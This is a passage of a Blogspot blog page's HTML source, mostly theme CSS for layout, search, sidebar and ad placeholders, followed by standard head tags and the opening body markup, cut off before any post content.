h3{\ncolor:#212121;\nfont-size:1.8em;\nmargin-top:0\n}\n.subscribe-popup .FollowByEmail h3{\ndisplay:none\n}\n.subscribe-popup .FollowByEmail .follow-by-email-submit{\ncolor:#2196f3;\ndisplay:inline-block;\nmargin:0 auto;\nmargin-top:24px;\nwidth:auto;\nwhite-space:normal\n}\n.subscribe-popup .FollowByEmail .follow-by-email-submit:disabled{\ncursor:default;\nopacity:.3\n}\n@media (max-width:800px){\n.blog-name div.widget.Subscribe{\nmargin-bottom:16px\n}\nbody.item-view .blog-name div.widget.Subscribe{\nmargin:8px auto 16px auto;\nwidth:100%\n}\n}\n.tabs{\nlist-style:none\n}\n.tabs li{\ndisplay:inline-block\n}\n.tabs li a{\ncursor:pointer;\ndisplay:inline-block;\nfont-weight:700;\ntext-transform:uppercase;\npadding:12px 8px\n}\n.tabs .selected{\nborder-bottom:4px solid #ffffff\n}\n.tabs .selected a{\ncolor:#ffffff\n}\nbody#layout .bg-photo,body#layout .bg-photo-overlay{\ndisplay:none\n}\nbody#layout .page_body{\npadding:0;\nposition:relative;\ntop:0\n}\nbody#layout .page{\ndisplay:inline-block;\nleft:inherit;\nposition:relative;\nvertical-align:top;\nwidth:540px\n}\nbody#layout .centered{\nmax-width:954px\n}\nbody#layout .navigation{\ndisplay:none\n}\nbody#layout .sidebar-container{\ndisplay:inline-block;\nwidth:40%\n}\nbody#layout .hamburger-menu,body#layout .search{\ndisplay:none\n}\n.centered-top-container .svg-icon-24,body.collapsed-header .centered-top-placeholder .svg-icon-24{\nfill:#ffffff\n}\n.sidebar-container .svg-icon-24{\nfill:#707070\n}\n.centered-bottom .svg-icon-24,body.collapsed-header .centered-top-container .svg-icon-24{\nfill:#707070\n}\n.centered-bottom .share-buttons .svg-icon-24,.share-buttons .svg-icon-24{\nfill:#212121\n}\nbody{\nbackground-color:#eeeeee;\ncolor:#757575;\nfont:15px Roboto, sans-serif;\nmargin:0;\nmin-height:100vh\n}\nimg{\nmax-width:100%\n}\nh3{\ncolor:#757575;\nfont-size:16px\n}\na{\ntext-decoration:none;\ncolor:#2196f3\n}\na:visited{\ncolor:#2196f3\n}\na:hover{\ncolor:#2196f3\n}\nblockquote{\ncolor:#444444;\nfont:italic 300 15px Roboto, sans-serif;\nfont-size:x-large;\ntext-align:center\n}\n.pill-button{\nfont-size:12px\n}\n.bg-photo-container{\nheight:480px;\noverflow:hidden;\nposition:absolute;\nwidth:100%;\nz-index:1\n}\n.bg-photo{\nbackground:#eeeeee url(https://themes.googleusercontent.com/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw) no-repeat scroll top center /* Credit: Michael Elkan (http://www.offset.com/photos/394244) */;;\nbackground-attachment:scroll;\nbackground-size:cover;\n-webkit-filter:blur(0px);\nfilter:blur(0px);\nheight:calc(100% + 2 * 0px);\nleft:0px;\nposition:absolute;\ntop:0px;\nwidth:calc(100% + 2 * 0px)\n}\n.bg-photo-overlay{\nbackground:rgba(0,0,0,.26);\nbackground-size:cover;\nheight:480px;\nposition:absolute;\nwidth:100%;\nz-index:2\n}\n.hamburger-menu{\nfloat:left;\nmargin-top:0\n}\n.sticky .hamburger-menu{\nfloat:none;\nposition:absolute\n}\n.search{\nborder-bottom:solid 1px rgba(255, 255, 255, 0);\nfloat:right;\nposition:relative;\n-webkit-transition-property:width;\ntransition-property:width;\n-webkit-transition-duration:.5s;\ntransition-duration:.5s;\n-webkit-transition-timing-function:cubic-bezier(.4,0,.2,1);\ntransition-timing-function:cubic-bezier(.4,0,.2,1);\nz-index:101\n}\n.search .dim-overlay{\nbackground-color:transparent\n}\n.search form{\nheight:36px;\n-webkit-transition-property:border-color;\ntransition-property:border-color;\n-webkit-transition-delay:.5s;\ntransition-delay:.5s;\n-webkit-transition-duration:.2s;\ntransition-duration:.2s;\n-webkit-transition-timing-function:cubic-bezier(.4,0,.2,1);\ntransition-timing-function:cubic-bezier(.4,0,.2,1)\n}\n.search.focused{\nwidth:calc(100% - 48px)\n}\n.search.focused form{\ndisplay:-webkit-box;\ndisplay:-webkit-flex;\ndisplay:-ms-flexbox;\ndisplay:flex;\n-webkit-box-flex:1;\n-webkit-flex:1 0 1px;\n-ms-flex:1 0 1px;\nflex:1 0 1px;\nborder-color:#ffffff;\nmargin-left:-24px;\npadding-left:36px;\nposition:relative;\nwidth:auto\n}\n.item-view .search,.sticky .search{\nright:0;\nfloat:none;\nmargin-left:0;\nposition:absolute\n}\n.item-view .search.focused,.sticky .search.focused{\nwidth:calc(100% - 50px)\n}\n.item-view .search.focused form,.sticky .search.focused form{\nborder-bottom-color:#757575\n}\n.centered-top-placeholder.cloned .search form{\nz-index:30\n}\n.search_button{\n-webkit-box-flex:0;\n-webkit-flex:0 0 24px;\n-ms-flex:0 0 24px;\nflex:0 0 24px;\n-webkit-box-orient:vertical;\n-webkit-box-direction:normal;\n-webkit-flex-direction:column;\n-ms-flex-direction:column;\nflex-direction:column\n}\n.search_button svg{\nmargin-top:0\n}\n.search-input{\nheight:48px\n}\n.search-input input{\ndisplay:block;\ncolor:#ffffff;\nfont:16px Roboto, sans-serif;\nheight:48px;\nline-height:48px;\npadding:0;\nwidth:100%\n}\n.search-input input::-webkit-input-placeholder{\ncolor:#ffffff;\nopacity:.3\n}\n.search-input input::-moz-placeholder{\ncolor:#ffffff;\nopacity:.3\n}\n.search-input input:-ms-input-placeholder{\ncolor:#ffffff;\nopacity:.3\n}\n.search-input input::-ms-input-placeholder{\ncolor:#ffffff;\nopacity:.3\n}\n.search-input input::placeholder{\ncolor:#ffffff;\nopacity:.3\n}\n.search-action{\nbackground:0 0;\nborder:0;\ncolor:#ffffff;\ncursor:pointer;\ndisplay:none;\nheight:48px;\nmargin-top:0\n}\n.sticky .search-action{\ncolor:#757575\n}\n.search.focused .search-action{\ndisplay:block\n}\n.search.focused .search-action:disabled{\nopacity:.3\n}\n.page_body{\nposition:relative;\nz-index:20\n}\n.page_body .widget{\nmargin-bottom:16px\n}\n.page_body .centered{\nbox-sizing:border-box;\ndisplay:-webkit-box;\ndisplay:-webkit-flex;\ndisplay:-ms-flexbox;\ndisplay:flex;\n-webkit-box-orient:vertical;\n-webkit-box-direction:normal;\n-webkit-flex-direction:column;\n-ms-flex-direction:column;\nflex-direction:column;\nmargin:0 auto;\nmax-width:922px;\nmin-height:100vh;\npadding:24px 0\n}\n.page_body .centered>*{\n-webkit-box-flex:0;\n-webkit-flex:0 0 auto;\n-ms-flex:0 0 auto;\nflex:0 0 auto\n}\n.page_body .centered>#footer{\nmargin-top:auto\n}\n.blog-name{\nmargin:24px 0 16px 0\n}\n.item-view .blog-name,.sticky .blog-name{\nbox-sizing:border-box;\nmargin-left:36px;\nmin-height:48px;\nopacity:1;\npadding-top:12px\n}\n.blog-name .subscribe-section-container{\nmargin-bottom:32px;\ntext-align:center;\n-webkit-transition-property:opacity;\ntransition-property:opacity;\n-webkit-transition-duration:.5s;\ntransition-duration:.5s\n}\n.item-view .blog-name .subscribe-section-container,.sticky .blog-name .subscribe-section-container{\nmargin:0 0 8px 0\n}\n.blog-name .PageList{\nmargin-top:16px;\npadding-top:8px;\ntext-align:center\n}\n.blog-name .PageList .overflowable-contents{\nwidth:100%\n}\n.blog-name .PageList h3.title{\ncolor:#ffffff;\nmargin:8px auto;\ntext-align:center;\nwidth:100%\n}\n.centered-top-container .blog-name{\n-webkit-transition-property:opacity;\ntransition-property:opacity;\n-webkit-transition-duration:.5s;\ntransition-duration:.5s\n}\n.item-view .return_link{\nmargin-bottom:12px;\nmargin-top:12px;\nposition:absolute\n}\n.item-view .blog-name{\ndisplay:-webkit-box;\ndisplay:-webkit-flex;\ndisplay:-ms-flexbox;\ndisplay:flex;\n-webkit-flex-wrap:wrap;\n-ms-flex-wrap:wrap;\nflex-wrap:wrap;\nmargin:0 48px 27px 48px\n}\n.item-view .subscribe-section-container{\n-webkit-box-flex:0;\n-webkit-flex:0 0 auto;\n-ms-flex:0 0 auto;\nflex:0 0 auto\n}\n.item-view #header,.item-view .Header{\nmargin-bottom:5px;\nmargin-right:15px\n}\n.item-view .sticky .Header{\nmargin-bottom:0\n}\n.item-view .Header p{\nmargin:10px 0 0 0;\ntext-align:left\n}\n.item-view .post-share-buttons-bottom{\nmargin-right:16px\n}\n.sticky{\nbackground:#ffffff;\nbox-shadow:0 0 20px 0 rgba(0,0,0,.7);\nbox-sizing:border-box;\nmargin-left:0\n}\n.sticky #header{\nmargin-bottom:8px;\nmargin-right:8px\n}\n.sticky .centered-top{\nmargin:4px auto;\nmax-width:890px;\nmin-height:48px\n}\n.sticky .blog-name{\ndisplay:-webkit-box;\ndisplay:-webkit-flex;\ndisplay:-ms-flexbox;\ndisplay:flex;\nmargin:0 48px\n}\n.sticky .blog-name #header{\n-webkit-box-flex:0;\n-webkit-flex:0 1 auto;\n-ms-flex:0 1 auto;\nflex:0 1 auto;\n-webkit-box-ordinal-group:2;\n-webkit-order:1;\n-ms-flex-order:1;\norder:1;\noverflow:hidden\n}\n.sticky .blog-name .subscribe-section-container{\n-webkit-box-flex:0;\n-webkit-flex:0 0 auto;\n-ms-flex:0 0 auto;\nflex:0 0 auto;\n-webkit-box-ordinal-group:3;\n-webkit-order:2;\n-ms-flex-order:2;\norder:2\n}\n.sticky .Header h1{\noverflow:hidden;\ntext-overflow:ellipsis;\nwhite-space:nowrap;\nmargin-right:-10px;\nmargin-bottom:-10px;\npadding-right:10px;\npadding-bottom:10px\n}\n.sticky .Header p{\ndisplay:none\n}\n.sticky .PageList{\ndisplay:none\n}\n.search-focused>*{\nvisibility:visible\n}\n.search-focused .hamburger-menu{\nvisibility:visible\n}\n.item-view .search-focused .blog-name,.sticky .search-focused .blog-name{\nopacity:0\n}\n.centered-bottom,.centered-top-container,.centered-top-placeholder{\npadding:0 16px\n}\n.centered-top{\nposition:relative\n}\n.item-view .centered-top.search-focused .subscribe-section-container,.sticky .centered-top.search-focused .subscribe-section-container{\nopacity:0\n}\n.page_body.has-vertical-ads .centered .centered-bottom{\ndisplay:inline-block;\nwidth:calc(100% - 176px)\n}\n.Header h1{\ncolor:#ffffff;\nfont:bold 45px Roboto, sans-serif;\nline-height:normal;\nmargin:0 0 13px 0;\ntext-align:center;\nwidth:100%\n}\n.Header h1 a,.Header h1 a:hover,.Header h1 a:visited{\ncolor:#ffffff\n}\n.item-view .Header h1,.sticky .Header h1{\nfont-size:24px;\nline-height:24px;\nmargin:0;\ntext-align:left\n}\n.sticky .Header h1{\ncolor:#757575\n}\n.sticky .Header h1 a,.sticky .Header h1 a:hover,.sticky .Header h1 a:visited{\ncolor:#757575\n}\n.Header p{\ncolor:#ffffff;\nmargin:0 0 13px 0;\nopacity:.8;\ntext-align:center\n}\n.widget .title{\nline-height:28px\n}\n.BlogArchive li{\nfont-size:16px\n}\n.BlogArchive .post-count{\ncolor:#757575\n}\n#page_body .FeaturedPost,.Blog .blog-posts .post-outer-container{\nbackground:#ffffff;\nmin-height:40px;\npadding:30px 40px;\nwidth:auto\n}\n.Blog .blog-posts .post-outer-container:last-child{\nmargin-bottom:0\n}\n.Blog .blog-posts .post-outer-container .post-outer{\nborder:0;\nposition:relative;\npadding-bottom:.25em\n}\n.post-outer-container{\nmargin-bottom:16px\n}\n.post:first-child{\nmargin-top:0\n}\n.post .thumb{\nfloat:left;\nheight:20%;\nwidth:20%\n}\n.post-share-buttons-bottom,.post-share-buttons-top{\nfloat:right\n}\n.post-share-buttons-bottom{\nmargin-right:24px\n}\n.post-footer,.post-header{\nclear:left;\ncolor:rgba(0, 0, 0, 0.54);\nmargin:0;\nwidth:inherit\n}\n.blog-pager{\ntext-align:center\n}\n.blog-pager a{\ncolor:#2196f3\n}\n.blog-pager a:visited{\ncolor:#2196f3\n}\n.blog-pager a:hover{\ncolor:#2196f3\n}\n.post-title{\nfont:bold 22px Roboto, sans-serif;\nfloat:left;\nmargin:0 0 8px 0;\nmax-width:calc(100% - 48px)\n}\n.post-title a{\nfont:bold 30px Roboto, sans-serif\n}\n.post-title,.post-title a,.post-title a:hover,.post-title a:visited{\ncolor:#212121\n}\n.post-body{\ncolor:#757575;\nfont:15px Roboto, sans-serif;\nline-height:1.6em;\nmargin:1.5em 0 2em 0;\ndisplay:block\n}\n.post-body img{\nheight:inherit\n}\n.post-body .snippet-thumbnail{\nfloat:left;\nmargin:0;\nmargin-right:2em;\nmax-height:128px;\nmax-width:128px\n}\n.post-body .snippet-thumbnail img{\nmax-width:100%\n}\n.main .FeaturedPost .widget-content{\nborder:0;\nposition:relative;\npadding-bottom:.25em\n}\n.FeaturedPost img{\nmargin-top:2em\n}\n.FeaturedPost .snippet-container{\nmargin:2em 0\n}\n.FeaturedPost .snippet-container p{\nmargin:0\n}\n.FeaturedPost .snippet-thumbnail{\nfloat:none;\nheight:auto;\nmargin-bottom:2em;\nmargin-right:0;\noverflow:hidden;\nmax-height:calc(600px + 2em);\nmax-width:100%;\ntext-align:center;\nwidth:100%\n}\n.FeaturedPost .snippet-thumbnail img{\nmax-width:100%;\nwidth:100%\n}\n.byline{\ncolor:rgba(0, 0, 0, 0.54);\ndisplay:inline-block;\nline-height:24px;\nmargin-top:8px;\nvertical-align:top\n}\n.byline.post-author:first-child{\nmargin-right:0\n}\n.byline.reactions .reactions-label{\nline-height:22px;\nvertical-align:top\n}\n.byline.post-share-buttons{\nposition:relative;\ndisplay:inline-block;\nmargin-top:0;\nwidth:100%\n}\n.byline.post-share-buttons .sharing{\nfloat:right\n}\n.flat-button.ripple:hover{\nbackground-color:rgba(33,150,243,.12)\n}\n.flat-button.ripple .splash{\nbackground-color:rgba(33,150,243,.4)\n}\na.timestamp-link,a:active.timestamp-link,a:visited.timestamp-link{\ncolor:inherit;\nfont:inherit;\ntext-decoration:inherit\n}\n.post-share-buttons{\nmargin-left:0\n}\n.clear-sharing{\nmin-height:24px\n}\n.comment-link{\ncolor:#2196f3;\nposition:relative\n}\n.comment-link .num_comments{\nmargin-left:8px;\nvertical-align:top\n}\n#comment-holder .continue{\ndisplay:none\n}\n#comment-editor{\nmargin-bottom:20px;\nmargin-top:20px\n}\n#comments .comment-form h4,#comments h3.title{\nposition:absolute;\nclip:rect(1px,1px,1px,1px);\npadding:0;\nborder:0;\nheight:1px;\nwidth:1px;\noverflow:hidden\n}\n.post-filter-message{\nbackground-color:rgba(0,0,0,.7);\ncolor:#fff;\ndisplay:table;\nmargin-bottom:16px;\nwidth:100%\n}\n.post-filter-message div{\ndisplay:table-cell;\npadding:15px 28px\n}\n.post-filter-message div:last-child{\npadding-left:0;\ntext-align:right\n}\n.post-filter-message a{\nwhite-space:nowrap\n}\n.post-filter-message .search-label,.post-filter-message .search-query{\nfont-weight:700;\ncolor:#2196f3\n}\n#blog-pager{\nmargin:2em 0\n}\n#blog-pager a{\ncolor:#2196f3;\nfont-size:14px\n}\n.subscribe-button{\nborder-color:#ffffff;\ncolor:#ffffff\n}\n.sticky .subscribe-button{\nborder-color:#757575;\ncolor:#757575\n}\n.tabs{\nmargin:0 auto;\npadding:0\n}\n.tabs li{\nmargin:0 8px;\nvertical-align:top\n}\n.tabs .overflow-button a,.tabs li a{\ncolor:#cccccc;\nfont:700 normal 15px Roboto, sans-serif;\nline-height:18px\n}\n.tabs .overflow-button a{\npadding:12px 8px\n}\n.overflow-popup .tabs li{\ntext-align:left\n}\n.overflow-popup li a{\ncolor:#757575;\ndisplay:block;\npadding:8px 20px\n}\n.overflow-popup li.selected a{\ncolor:#212121\n}\na.report_abuse{\nfont-weight:400\n}\n.Label li,.Label span.label-size,.byline.post-labels a{\nbackground-color:#f7f7f7;\nborder:1px solid #f7f7f7;\nborder-radius:15px;\ndisplay:inline-block;\nmargin:4px 4px 4px 0;\npadding:3px 8px\n}\n.Label a,.byline.post-labels a{\ncolor:rgba(0,0,0,0.54)\n}\n.Label ul{\nlist-style:none;\npadding:0\n}\n.PopularPosts{\nbackground-color:#eeeeee;\npadding:30px 40px\n}\n.PopularPosts .item-content{\ncolor:#757575;\nmargin-top:24px\n}\n.PopularPosts a,.PopularPosts a:hover,.PopularPosts a:visited{\ncolor:#2196f3\n}\n.PopularPosts .post-title,.PopularPosts .post-title a,.PopularPosts .post-title a:hover,.PopularPosts .post-title a:visited{\ncolor:#212121;\nfont-size:18px;\nfont-weight:700;\nline-height:24px\n}\n.PopularPosts,.PopularPosts h3.title a{\ncolor:#757575;\nfont:15px Roboto, sans-serif\n}\n.main .PopularPosts{\npadding:16px 40px\n}\n.PopularPosts h3.title{\nfont-size:14px;\nmargin:0\n}\n.PopularPosts h3.post-title{\nmargin-bottom:0\n}\n.PopularPosts .byline{\ncolor:rgba(0, 0, 0, 0.54)\n}\n.PopularPosts .jump-link{\nfloat:right;\nmargin-top:16px\n}\n.PopularPosts .post-header .byline{\nfont-size:.9em;\nfont-style:italic;\nmargin-top:6px\n}\n.PopularPosts ul{\nlist-style:none;\npadding:0;\nmargin:0\n}\n.PopularPosts .post{\npadding:20px 0\n}\n.PopularPosts .post+.post{\nborder-top:1px dashed #cccccc\n}\n.PopularPosts .item-thumbnail{\nfloat:left;\nmargin-right:32px\n}\n.PopularPosts .item-thumbnail img{\nheight:88px;\npadding:0;\nwidth:88px\n}\n.inline-ad{\nmargin-bottom:16px\n}\n.desktop-ad .inline-ad{\ndisplay:block\n}\n.adsbygoogle{\noverflow:hidden\n}\n.vertical-ad-container{\nfloat:right;\nmargin-right:16px;\nwidth:128px\n}\n.vertical-ad-container .AdSense+.AdSense{\nmargin-top:16px\n}\n.inline-ad-placeholder,.vertical-ad-placeholder{\nbackground:#ffffff;\nborder:1px solid #000;\nopacity:.9;\nvertical-align:middle;\ntext-align:center\n}\n.inline-ad-placeholder span,.vertical-ad-placeholder span{\nmargin-top:290px;\ndisplay:block;\ntext-transform:uppercase;\nfont-weight:700;\ncolor:#212121\n}\n.vertical-ad-placeholder{\nheight:600px\n}\n.vertical-ad-placeholder span{\nmargin-top:290px;\npadding:0 40px\n}\n.inline-ad-placeholder{\nheight:90px\n}\n.inline-ad-placeholder span{\nmargin-top:36px\n}\n.Attribution{\ncolor:#757575\n}\n.Attribution a,.Attribution a:hover,.Attribution a:visited{\ncolor:#2196f3\n}\n.Attribution svg{\nfill:#707070\n}\n.sidebar-container{\nbox-shadow:1px 1px 3px rgba(0,0,0,.1)\n}\n.sidebar-container,.sidebar-container .sidebar_bottom{\nbackground-color:#ffffff\n}\n.sidebar-container .navigation,.sidebar-container .sidebar_top_wrapper{\nbackground-color:#ffffff\n}\n.sidebar-container .sidebar_top{\noverflow:auto\n}\n.sidebar-container .sidebar_bottom{\nwidth:100%;\npadding-top:16px\n}\n.sidebar-container .widget:first-child{\npadding-top:0\n}\n.sidebar_top .widget.Profile{\npadding-bottom:16px\n}\n.widget.Profile{\nmargin:0;\nwidth:100%\n}\n.widget.Profile h2{\ndisplay:none\n}\n.widget.Profile h3.title{\ncolor:rgba(0,0,0,0.52);\nmargin:16px 32px\n}\n.widget.Profile .individual{\ntext-align:center\n}\n.widget.Profile .individual .profile-link{\npadding:1em\n}\n.widget.Profile .individual .default-avatar-wrapper .avatar-icon{\nmargin:auto\n}\n.widget.Profile .team{\nmargin-bottom:32px;\nmargin-left:32px;\nmargin-right:32px\n}\n.widget.Profile ul{\nlist-style:none;\npadding:0\n}\n.widget.Profile li{\nmargin:10px 0\n}\n.widget.Profile .profile-img{\nborder-radius:50%;\nfloat:none\n}\n.widget.Profile .profile-link{\ncolor:#212121;\nfont-size:.9em;\nmargin-bottom:1em;\nopacity:.87;\noverflow:hidden\n}\n.widget.Profile .profile-link.visit-profile{\nborder-style:solid;\nborder-width:1px;\nborder-radius:12px;\ncursor:pointer;\nfont-size:12px;\nfont-weight:400;\npadding:5px 20px;\ndisplay:inline-block;\nline-height:normal\n}\n.widget.Profile dd{\ncolor:rgba(0, 0, 0, 0.54);\nmargin:0 16px\n}\n.widget.Profile location{\nmargin-bottom:1em\n}\n.widget.Profile .profile-textblock{\nfont-size:14px;\nline-height:24px;\nposition:relative\n}\nbody.sidebar-visible .page_body{\noverflow-y:scroll\n}\nbody.sidebar-visible .bg-photo-container{\noverflow-y:scroll\n}\n@media screen and (min-width:1440px){\n.sidebar-container{\nmargin-top:480px;\nmin-height:calc(100% - 480px);\noverflow:visible;\nz-index:32\n}\n.sidebar-container .sidebar_top_wrapper{\nbackground-color:#f7f7f7;\nheight:480px;\nmargin-top:-480px\n}\n.sidebar-container .sidebar_top{\ndisplay:-webkit-box;\ndisplay:-webkit-flex;\ndisplay:-ms-flexbox;\ndisplay:flex;\nheight:480px;\n-webkit-box-orient:horizontal;\n-webkit-box-direction:normal;\n-webkit-flex-direction:row;\n-ms-flex-direction:row;\nflex-direction:row;\nmax-height:480px\n}\n.sidebar-container .sidebar_bottom{\nmax-width:284px;\nwidth:284px\n}\nbody.collapsed-header .sidebar-container{\nz-index:15\n}\n.sidebar-container .sidebar_top:empty{\ndisplay:none\n}\n.sidebar-container .sidebar_top>:only-child{\n-webkit-box-flex:0;\n-webkit-flex:0 0 auto;\n-ms-flex:0 0 auto;\nflex:0 0 auto;\n-webkit-align-self:center;\n-ms-flex-item-align:center;\nalign-self:center;\nwidth:100%\n}\n.sidebar_top_wrapper.no-items{\ndisplay:none\n}\n}\n.post-snippet.snippet-container{\nmax-height:120px\n}\n.post-snippet .snippet-item{\nline-height:24px\n}\n.post-snippet .snippet-fade{\nbackground:-webkit-linear-gradient(left,#ffffff 0,#ffffff 20%,rgba(255, 255, 255, 0) 100%);\nbackground:linear-gradient(to left,#ffffff 0,#ffffff 20%,rgba(255, 255, 255, 0) 100%);\ncolor:#757575;\nheight:24px\n}\n.popular-posts-snippet.snippet-container{\nmax-height:72px\n}\n.popular-posts-snippet .snippet-item{\nline-height:24px\n}\n.PopularPosts .popular-posts-snippet .snippet-fade{\ncolor:#757575;\nheight:24px\n}\n.main .popular-posts-snippet .snippet-fade{\nbackground:-webkit-linear-gradient(left,#eeeeee 0,#eeeeee 20%,rgba(238, 238, 238, 0) 100%);\nbackground:linear-gradient(to left,#eeeeee 0,#eeeeee 20%,rgba(238, 238, 238, 0) 100%)\n}\n.sidebar_bottom .popular-posts-snippet .snippet-fade{\nbackground:-webkit-linear-gradient(left,#ffffff 0,#ffffff 20%,rgba(255, 255, 255, 0) 100%);\nbackground:linear-gradient(to left,#ffffff 0,#ffffff 20%,rgba(255, 255, 255, 0) 100%)\n}\n.profile-snippet.snippet-container{\nmax-height:192px\n}\n.has-location .profile-snippet.snippet-container{\nmax-height:144px\n}\n.profile-snippet .snippet-item{\nline-height:24px\n}\n.profile-snippet .snippet-fade{\nbackground:-webkit-linear-gradient(left,#ffffff 0,#ffffff 20%,rgba(255, 255, 255, 0) 100%);\nbackground:linear-gradient(to left,#ffffff 0,#ffffff 20%,rgba(255, 255, 255, 0) 100%);\ncolor:rgba(0, 0, 0, 0.54);\nheight:24px\n}\n@media screen and (min-width:1440px){\n.profile-snippet .snippet-fade{\nbackground:-webkit-linear-gradient(left,#f7f7f7 0,#f7f7f7 20%,rgba(247, 247, 247, 0) 100%);\nbackground:linear-gradient(to left,#f7f7f7 0,#f7f7f7 20%,rgba(247, 247, 247, 0) 100%)\n}\n}\n@media screen and (max-width:800px){\n.blog-name{\nmargin-top:0\n}\nbody.item-view .blog-name{\nmargin:0 48px\n}\n.centered-bottom{\npadding:8px\n}\nbody.item-view .centered-bottom{\npadding:0\n}\n.page_body .centered{\npadding:10px 0\n}\nbody.item-view #header,body.item-view .widget.Header{\nmargin-right:0\n}\nbody.collapsed-header .centered-top-container .blog-name{\ndisplay:block\n}\nbody.collapsed-header .centered-top-container .widget.Header h1{\ntext-align:center\n}\n.widget.Header header{\npadding:0\n}\n.widget.Header h1{\nfont-size:24px;\nline-height:24px;\nmargin-bottom:13px\n}\nbody.item-view .widget.Header h1{\ntext-align:center\n}\nbody.item-view .widget.Header p{\ntext-align:center\n}\n.blog-name .widget.PageList{\npadding:0\n}\nbody.item-view .centered-top{\nmargin-bottom:5px\n}\n.search-action,.search-input{\nmargin-bottom:-8px\n}\n.search form{\nmargin-bottom:8px\n}\nbody.item-view .subscribe-section-container{\nmargin:5px 0 0 0;\nwidth:100%\n}\n#page_body.section div.widget.FeaturedPost,div.widget.PopularPosts{\npadding:16px\n}\ndiv.widget.Blog .blog-posts .post-outer-container{\npadding:16px\n}\ndiv.widget.Blog .blog-posts .post-outer-container .post-outer{\npadding:0\n}\n.post:first-child{\nmargin:0\n}\n.post-body .snippet-thumbnail{\nmargin:0 3vw 3vw 0\n}\n.post-body .snippet-thumbnail img{\nheight:20vw;\nwidth:20vw;\nmax-height:128px;\nmax-width:128px\n}\ndiv.widget.PopularPosts div.item-thumbnail{\nmargin:0 3vw 3vw 0\n}\ndiv.widget.PopularPosts div.item-thumbnail img{\nheight:20vw;\nwidth:20vw;\nmax-height:88px;\nmax-width:88px\n}\n.post-title{\nline-height:1\n}\n.post-title,.post-title a{\nfont-size:20px\n}\n#page_body.section div.widget.FeaturedPost h3 a{\nfont-size:22px\n}\n.mobile-ad .inline-ad{\ndisplay:block\n}\n.page_body.has-vertical-ads .vertical-ad-container,.page_body.has-vertical-ads .vertical-ad-container ins{\ndisplay:none\n}\n.page_body.has-vertical-ads .centered .centered-bottom,.page_body.has-vertical-ads .centered .centered-top{\ndisplay:block;\nwidth:auto\n}\ndiv.post-filter-message div{\npadding:8px 16px\n}\n}\n@media screen and (min-width:1440px){\nbody{\nposition:relative\n}\nbody.item-view .blog-name{\nmargin-left:48px\n}\n.page_body{\nmargin-left:284px\n}\n.search{\nmargin-left:0\n}\n.search.focused{\nwidth:100%\n}\n.sticky{\npadding-left:284px\n}\n.hamburger-menu{\ndisplay:none\n}\nbody.collapsed-header .page_body .centered-top-container{\npadding-left:284px;\npadding-right:0;\nwidth:100%\n}\nbody.collapsed-header .centered-top-container .search.focused{\nwidth:100%\n}\nbody.collapsed-header .centered-top-container .blog-name{\nmargin-left:0\n}\nbody.collapsed-header.item-view .centered-top-container .search.focused{\nwidth:calc(100% - 50px)\n}\nbody.collapsed-header.item-view .centered-top-container .blog-name{\nmargin-left:40px\n}\n}\n\n--></style>\n<style id='template-skin-1' type='text/css'><!--\nbody#layout .hidden,\nbody#layout .invisible {\ndisplay: inherit;\n}\nbody#layout .navigation {\ndisplay: none;\n}\nbody#layout .page,\nbody#layout .sidebar_top,\nbody#layout .sidebar_bottom {\ndisplay: inline-block;\nleft: inherit;\nposition: relative;\nvertical-align: top;\n}\nbody#layout .page {\nfloat: right;\nmargin-left: 20px;\nwidth: 55%;\n}\nbody#layout .sidebar-container {\nfloat: right;\nwidth: 40%;\n}\nbody#layout .hamburger-menu {\ndisplay: none;\n}\n--></style>\n<style>\n .bg-photo {background-image:url(https\\:\\/\\/themes.googleusercontent.com\\/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw);}\n \n@media (max-width: 480px) { .bg-photo {background-image:url(https\\:\\/\\/themes.googleusercontent.com\\/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw&options=w480);}}\n@media (max-width: 640px) and (min-width: 481px) { .bg-photo {background-image:url(https\\:\\/\\/themes.googleusercontent.com\\/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw&options=w640);}}\n@media (max-width: 800px) and (min-width: 641px) { .bg-photo {background-image:url(https\\:\\/\\/themes.googleusercontent.com\\/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw&options=w800);}}\n@media (max-width: 1200px) and (min-width: 801px) { .bg-photo {background-image:url(https\\:\\/\\/themes.googleusercontent.com\\/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw&options=w1200);}}\n/* Last tag covers anything over one higher than the previous max-size cap. */\n@media (min-width: 1201px) { .bg-photo {background-image:url(https\\:\\/\\/themes.googleusercontent.com\\/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw&options=w1600);}}\n </style>\n<script async='async' src='https://www.gstatic.com/external_hosted/clipboardjs/clipboard.min.js'></script>\n<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>\n<meta name='google-adsense-platform-domain' content='blogspot.com'/>\n\n</head>\n<body class='version-1-3-3'>\n<a class='skip-navigation' href='#main' tabindex='0'>\nSkip to main content\n</a>\n<div class='page'>\n<div class='bg-photo-overlay'></div>\n<div class='bg-photo-container'>\n<div class='bg-photo'></div>\n</div>\n<div class='page_body'>\n<div class='centered'>\n<div class='centered-top-placeholder'></div>\n<header class='centered-top-container' role='banner'>\n<div class='centered-top'>\n<button class='svg-icon-24-button hamburger-menu flat-icon-button ripple'>\n<svg class='svg-icon-24'>\n<use xlink:href='/responsive/sprite_v1_6.css.svg#ic_menu_black_24dp' xmlns:xlink='http://www.w3.org/1999/xlink'></use>\n</svg>\n</button>\n<div class='search'>\n<button aria-label='Search' class='search-expand touch-icon-button'>\n<div class='flat-icon-button ripple'>\n<svg class='svg-icon-24 search-expand-icon'>\n<use xlink:href='/responsive/sprite_v1_6.css.svg#ic_search_black_24dp' xmlns:xlink='http://www.w3.org/1999/xlink'></use>\n</svg>\n</div>\n</button>\n<div class='section' id='search_top' name='Search (Top)'><div class='widget 